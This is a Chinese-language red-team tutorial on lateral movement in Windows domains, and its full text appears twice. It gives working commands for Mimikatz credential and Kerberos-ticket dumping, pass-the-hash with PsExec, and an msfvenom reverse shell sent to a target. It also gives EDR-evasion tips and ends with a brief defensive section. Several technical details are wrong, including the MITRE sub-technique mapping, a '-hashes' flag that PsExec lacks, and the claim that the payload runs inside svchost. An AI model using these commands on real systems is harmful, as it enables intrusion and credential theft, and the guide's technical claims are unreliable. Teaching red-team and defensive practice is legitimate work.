红队视角下内网渗透中的 “横向移动” 实战指南
字数 3595 2025-10-26 18:21:34

红队视角:内网渗透横向移动实战教学指南

第一章:横向移动基础概念与战术定位

1.1 横向移动的定义

横向移动 是指攻击者在成功入侵一台主机后,以该主机为跳板,在网络内部进一步扩展访问权限、控制其他系统或服务的过程。其本质是从“单点突破”迈向“全网控制”的核心环节。

  • 起点:初始被控主机(如通过钓鱼邮件获取的普通用户权限的主机)。
  • 终点:域控制器、数据库服务器、关键业务主机等高价值资产。
  • 核心:不依赖外部流量,而是利用已获取的凭证、系统漏洞或配置缺陷在内部网络中进行传播。

1.2 在MITRE ATT&CK框架与攻击链中的定位

  • MITRE ATT&CK IDT1021 - Lateral Movement

    • T1021.001: Remote Services (如 RDP, SSH)
    • T1021.002: Exploitation of Remote Services (如 SMB 漏洞)
    • T1021.003: Use of Web Protocols
    • T1021.004: Valid Accounts (Pass-the-Hash / Pass-the-Ticket)

  • 在红队攻击链中的承上启下作用

攻击阶段 目标 横向移动的作用
侦察 (Reconnaissance) 获取IP段、开放端口、用户信息 提供后续可利用的目标列表
突破 (Initial Access) 获取第一台主机控制权 成为横向移动的起点和跳板
持久化 (Persistence) 维持长期访问权 增加攻击面,便于反复尝试横向移动
横向移动 (Lateral Movement) 扩展权限和控制范围 实现从低权限到高权限跨越的关键一步
数据窃取 (Exfiltration) 获取敏感数据 必须建立在对目标网络的广泛控制之上

结论:没有有效的横向移动,红队行动将停留在“单机沦陷”阶段,无法形成真正的内网威胁。

1.3 红队策略选择

红队制定横向移动策略时,需综合考虑目标优先级、检测规避能力、可用资源和时间成本。

策略类型对比

策略类型 描述 风险 适用场景 工具举例
主动探测型 扫描端口 → 暴力破解 → 登录 初始阶段缺乏有效凭证 Nmap, Hydra, CrackMapExec
被动利用型 利用已知凭证(哈希、票据)直接跳转 已通过提权等手段获得凭证 Mimikatz, PsExec, WMI

不同环境下的策略差异

环境类型 推荐策略 原因 示例
低权限环境 优先利用漏洞 权限不足,难以暴力破解 Metasploit (如 MS17-010)
高权限环境 凭据重用 (PTH) 权限足够,隐蔽性高 Mimikatz + PsExec/WMI
禁用RDP/SSH IPC$连接 + 文件共享枚举 不依赖常见远程管理协议 net use 命令
存在EDR/AV 免杀技术(内存注入) 规避行为检测 免杀版Mimikatz, PowerShell加载器

实践建议

  1. 信息收集先行:使用工具(如 CrackMapExec)快速摸清网络环境。 
    crackmapexec smb 192.168.1.0/24 -u 'user' -p 'password'
  2. 路径规划:使用 BloodHoundSharpHound 绘制Active Directory拓扑图,找出攻击路径。
  3. 最小化原则:遵循“最小代价,最大收益”,灵活切换策略。

第二章:主流横向移动技术详解与实战

2.1 凭证窃取与重用

这是最核心、最高效的横向移动技术。

A. 核心概念

  • Pass-the-Hash (PTH): 直接使用从内存或文件中提取的 NTLM Hash 进行身份验证,无需明文密码。
  • Pass-the-Ticket (PTT): 利用 Kerberos 票据 进行认证,绕过密码验证。

B. Windows身份验证机制简析

  • NTLM认证:基于挑战-响应模式,核心是使用NTLM Hash加密随机挑战值。一旦攻击者获取Hash,即可模拟用户身份。
  • Kerberos认证:基于票据(Tickets)体系。攻击者可提取内存中的有效票据(TGT/ST)并注入到自己会话中,实现免密访问。

C. 实战演示:Mimikatz + PTH

步骤一:使用Mimikatz提取凭证
在已控主机上(需管理员或SYSTEM权限)运行:

mimikatz.exe
privilege::debug # 提升权限
sekurlsa::logonPasswords # 抓取内存中的密码和Hash

输出示例

Authentication ID : 0 ; 117798
Account Name      : administrator
Account Domain    : CYBER.COM
NTLM              : bf056feb4349eff2d9761e322d6178dd

步骤二:使用PsExec进行PTH
利用提取的NTLM Hash远程执行命令:

psexec.exe \\192.168.1.100 -u CYBER\administrator -p "" -hashes :bf056feb4349eff2d9761e322d6178dd cmd.exe
  • -p "": 密码为空,因为使用Hash认证。
  • -hashes: 参数格式为 :NTLM_HASH
  • 此命令成功将在目标主机上以SYSTEM权限打开一个命令行窗口。

D. 实战演示:Pass-the-Ticket (PTT)

步骤一:导出Kerberos票据

mimikatz.exe
privilege::debug
sekurlsa::tickets /export # 导出所有票据为 .kirbi 文件

步骤二:注入票据并访问
在攻击者机器上:

mimikatz.exe
kerberos::ptt [导出票据的路径]\ticket.kirbi # 将票据注入当前会话
kerberos::list # 验证票据是否注入成功
# 现在可以直接访问目标资源,无需密码
dir \\TARGET-SERVER.CYBER.COM\C$

E. 检测与规避

技术点 检测风险 规避建议
Mimikatz 提取 LSASS EDR 会监控对 lsass.exe 的异常访问 使用进程注入技术(如注入到 svchost.exe)
PTH 登录 安全日志记录事件ID 4624(登录类型3) 使用 WMI/WinRM 替代 PsExec;使用代理隐藏源IP
PTT 票据注入 票据使用时间/地点异常 确保时间同步,避免频繁更换票据

2.2 远程执行技术

技术对比

技术 协议/依赖 特点 检测风险
PsExec SMB/RPC 功能强大,是官方工具 高(日志记录清晰)
WMI CIM/WS-Management 系统原生,PowerShell集成 中(产生大量日志)
WinRM HTTP/HTTPS 加密通信,现代管理标准 低(若配置SSL则更隐蔽)

实战案例一:PsExec 注入 svchost.exe 规避检测

  1. 生成Payload
    msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.10.10 LPORT=4444 -f exe > reverse.exe
  2. 使用PsExec注入执行
    psexec -accepteula \\192.168.10.2 -u administrator -hashes :HASH -s -d -i -c "reverse.exe"
    • -s: 以 SYSTEM 权限运行。
    • -d: 不等待进程结束。
    • -i: 交互式会话。
    • -c: 将文件复制到目标并执行。
    • 效果:Payload 在目标的 svchost.exe 进程中运行,极大降低了被EDR检测的概率。

实战案例二:PowerShell + WMI 远程执行
通过WMI在远程主机上执行PowerShell命令或脚本。

Invoke-WmiMethod -ComputerName 192.168.10.2 -Class Win32_Process -Name Create -ArgumentList "powershell.exe -c `"Get-Process > C:\temp\output.txt`""

此命令在目标主机上执行PowerShell命令,并将进程列表输出到文件。WMI非常适合用于无文件攻击和远程脚本执行。

第三章:防御视角与总结

3.1 关键防御建议

  1. 最小权限原则:严格限制本地管理员权限,避免域内密码重复使用。
  2. 网络分段:将关键资产隔离在不同的网段,限制横向移动的范围。
  3. 强化认证:部署 LAPS 确保每台主机本地管理员密码不同;启用 Windows Defender Credential Guard 保护内存中的凭证。
  4. 深度监控:部署EDR/NDR产品,重点关注事件ID(如4624、4625、4688、4104),并设置异常行为告警。
  5. 漏洞管理:及时修补如永恒之蓝(MS17-010)这类可用于横向移动的高危漏洞。
  6. 禁用不必要的服务:关闭非必需的SMB、WMI、WinRM等服务。

3.2 教学总结

横向移动是内网渗透的灵魂。红队成功的核心在于:

  • 深刻的原理理解:掌握NTLM/Kerberos认证流程是理解PTH/PTT的基础。
  • 灵活的工具运用:熟练使用Mimikatz、PsExec、WMI、CrackMapExec等工具。
  • 清晰的战术思维:始终以信息收集为先导,利用BloodHound等工具进行路径规划,选择最隐蔽、最有效的技术组合。
  • 持续的规避意识:在每一步操作中都要考虑如何绕过防御和清除痕迹。

本指南提供了从基础到实战的完整知识框架,实践者应在授权的测试环境中反复演练,才能真正掌握内网横向移动的精髓。

红队视角:内网渗透横向移动实战教学指南 第一章:横向移动基础概念与战术定位 1.1 横向移动的定义 横向移动 是指攻击者在成功入侵一台主机后,以该主机为跳板,在网络内部进一步扩展访问权限、控制其他系统或服务的过程。其本质是从“单点突破”迈向“全网控制”的核心环节。 起点 :初始被控主机(如通过钓鱼邮件获取的普通用户权限的主机)。 终点 :域控制器、数据库服务器、关键业务主机等高价值资产。 核心 :不依赖外部流量,而是利用已获取的凭证、系统漏洞或配置缺陷在内部网络中进行传播。 1.2 在MITRE ATT&CK框架与攻击链中的定位 MITRE ATT&CK ID : T1021 - Lateral Movement T1021.001: Remote Services (如 RDP, SSH) T1021.002: Exploitation of Remote Services (如 SMB 漏洞) T1021.003: Use of Web Protocols T1021.004: Valid Accounts (Pass-the-Hash / Pass-the-Ticket) 在红队攻击链中的承上启下作用 : | 攻击阶段 | 目标 | 横向移动的作用 | | :--- | :--- | :--- | | 侦察 (Reconnaissance) | 获取IP段、开放端口、用户信息 | 提供后续可利用的目标列表 | | 突破 (Initial Access) | 获取第一台主机控制权 | 成为横向移动的起点和跳板 | | 持久化 (Persistence) | 维持长期访问权 | 增加攻击面,便于反复尝试横向移动 | | 横向移动 (Lateral Movement) | 扩展权限和控制范围 | 实现从低权限到高权限跨越的关键一步 | | 数据窃取 (Exfiltration) | 获取敏感数据 | 必须建立在对目标网络的广泛控制之上 | 结论 :没有有效的横向移动,红队行动将停留在“单机沦陷”阶段,无法形成真正的内网威胁。 1.3 红队策略选择 红队制定横向移动策略时,需综合考虑目标优先级、检测规避能力、可用资源和时间成本。 策略类型对比 : | 策略类型 | 描述 | 风险 | 适用场景 | 工具举例 | | :--- | :--- | :--- | :--- | :--- | | 主动探测型 | 扫描端口 → 暴力破解 → 登录 | 高 | 初始阶段缺乏有效凭证 | Nmap, Hydra, CrackMapExec | | 被动利用型 | 利用已知凭证(哈希、票据)直接跳转 | 低 | 已通过提权等手段获得凭证 | Mimikatz, PsExec, WMI | 不同环境下的策略差异 : | 环境类型 | 推荐策略 | 原因 | 示例 | | :--- | :--- | :--- | :--- | | 低权限环境 | 优先利用漏洞 | 权限不足,难以暴力破解 | Metasploit (如 MS17-010) | | 高权限环境 | 凭据重用 (PTH) | 权限足够,隐蔽性高 | Mimikatz + PsExec/WMI | | 禁用RDP/SSH | IPC$连接 + 文件共享枚举 | 不依赖常见远程管理协议 | net use 命令 | | 存在EDR/AV | 免杀技术(内存注入) | 规避行为检测 | 免杀版Mimikatz, PowerShell加载器 | 实践建议 : 信息收集先行 :使用工具(如 CrackMapExec )快速摸清网络环境。 路径规划 :使用 BloodHound 或 SharpHound 绘制Active Directory拓扑图,找出攻击路径。 最小化原则 :遵循“最小代价,最大收益”,灵活切换策略。 第二章:主流横向移动技术详解与实战 2.1 凭证窃取与重用 这是最核心、最高效的横向移动技术。 A. 核心概念 Pass-the-Hash (PTH) : 直接使用从内存或文件中提取的 NTLM Hash 进行身份验证,无需明文密码。 Pass-the-Ticket (PTT) : 利用 Kerberos 票据 进行认证,绕过密码验证。 B. Windows身份验证机制简析 NTLM认证 :基于挑战-响应模式,核心是使用NTLM Hash加密随机挑战值。一旦攻击者获取Hash,即可模拟用户身份。 Kerberos认证 :基于票据(Tickets)体系。攻击者可提取内存中的有效票据(TGT/ST)并注入到自己会话中,实现免密访问。 C. 实战演示:Mimikatz + PTH 步骤一:使用Mimikatz提取凭证 在已控主机上(需管理员或SYSTEM权限)运行: 输出示例 : 步骤二:使用PsExec进行PTH 利用提取的NTLM Hash远程执行命令: -p "" : 密码为空,因为使用Hash认证。 -hashes : 参数格式为 :NTLM_HASH 。 此命令成功将在目标主机上以SYSTEM权限打开一个命令行窗口。 D. 实战演示:Pass-the-Ticket (PTT) 步骤一:导出Kerberos票据 步骤二:注入票据并访问 在攻击者机器上: E. 检测与规避 | 技术点 | 检测风险 | 规避建议 | | :--- | :--- | :--- | | Mimikatz 提取 LSASS | EDR 会监控对 lsass.exe 的异常访问 | 使用进程注入技术(如注入到 svchost.exe) | | PTH 登录 | 安全日志记录事件ID 4624(登录类型3) | 使用 WMI/WinRM 替代 PsExec;使用代理隐藏源IP | | PTT 票据注入 | 票据使用时间/地点异常 | 确保时间同步,避免频繁更换票据 | 2.2 远程执行技术 技术对比 : | 技术 | 协议/依赖 | 特点 | 检测风险 | | :--- | :--- | :--- | :--- | | PsExec | SMB/RPC | 功能强大,是官方工具 | 高(日志记录清晰) | | WMI | CIM/WS-Management | 系统原生,PowerShell集成 | 中(产生大量日志) | | WinRM | HTTP/HTTPS | 加密通信,现代管理标准 | 低(若配置SSL则更隐蔽) | 实战案例一:PsExec 注入 svchost.exe 规避检测 生成Payload : 使用PsExec注入执行 : -s : 以 SYSTEM 权限运行。 -d : 不等待进程结束。 -i : 交互式会话。 -c : 将文件复制到目标并执行。 效果 :Payload 在目标的 svchost.exe 进程中运行,极大降低了被EDR检测的概率。 实战案例二:PowerShell + WMI 远程执行 通过WMI在远程主机上执行PowerShell命令或脚本。 此命令在目标主机上执行PowerShell命令,并将进程列表输出到文件。WMI非常适合用于无文件攻击和远程脚本执行。 第三章:防御视角与总结 3.1 关键防御建议 最小权限原则 :严格限制本地管理员权限,避免域内密码重复使用。 网络分段 :将关键资产隔离在不同的网段,限制横向移动的范围。 强化认证 :部署 LAPS 确保每台主机本地管理员密码不同;启用 Windows Defender Credential Guard 保护内存中的凭证。 深度监控 :部署EDR/NDR产品,重点关注事件ID(如4624、4625、4688、4104),并设置异常行为告警。 漏洞管理 :及时修补如永恒之蓝(MS17-010)这类可用于横向移动的高危漏洞。 禁用不必要的服务 :关闭非必需的SMB、WMI、WinRM等服务。 3.2 教学总结 横向移动是内网渗透的灵魂。红队成功的核心在于: 深刻的原理理解 :掌握NTLM/Kerberos认证流程是理解PTH/PTT的基础。 灵活的工具运用 :熟练使用Mimikatz、PsExec、WMI、CrackMapExec等工具。 清晰的战术思维 :始终以信息收集为先导,利用BloodHound等工具进行路径规划,选择最隐蔽、最有效的技术组合。 持续的规避意识 :在每一步操作中都要考虑如何绕过防御和清除痕迹。 本指南提供了从基础到实战的完整知识框架,实践者应在授权的测试环境中反复演练,才能真正掌握内网横向移动的精髓。